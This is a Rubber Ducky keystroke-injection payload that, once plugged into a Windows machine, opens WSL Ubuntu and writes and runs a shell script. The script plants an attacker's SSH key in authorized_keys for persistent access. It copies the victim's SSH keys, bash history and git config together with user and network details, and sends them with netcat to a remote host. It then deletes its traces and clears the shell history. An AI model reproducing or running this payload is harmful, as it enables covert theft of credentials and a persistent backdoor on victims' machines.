REM RUBBER DUCKY VERSION 1.1
GUI r
DELAY 250
STRING ubuntu
ENTER
DELAY 1000
STRING nano ~/sample.sh
ENTER
STRING rm ~/sample.sh
ENTER
STRING touch ~/.ssh/authorized_keys
ENTER
STRING echo ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDJz+uLagY7SoQbW/zUdBRdW3WnocUz+5FON8We9UITO sample@host >> ~/.ssh/authorized_keys
ENTER
STRING cp -r ~/.ssh ~/temp_dir
ENTER
STRING cp ~/.bash_history ~/temp_dir
ENTER
STRING cp ~/.gitconfig ~/temp_dir
ENTER
STRING (whoami && ip a) >> ~/temp_dir/.details
ENTER
STRING tar cf - ~/temp_dir | nc 192.168.0.3 30000
ENTER
STRING rm -rf ~/temp_dir
CTRL x
y
ENTER
STRING chmod +x ~/sample.sh
ENTER
STRING ~/./sample.sh && history -c && history -w && exit
ENTER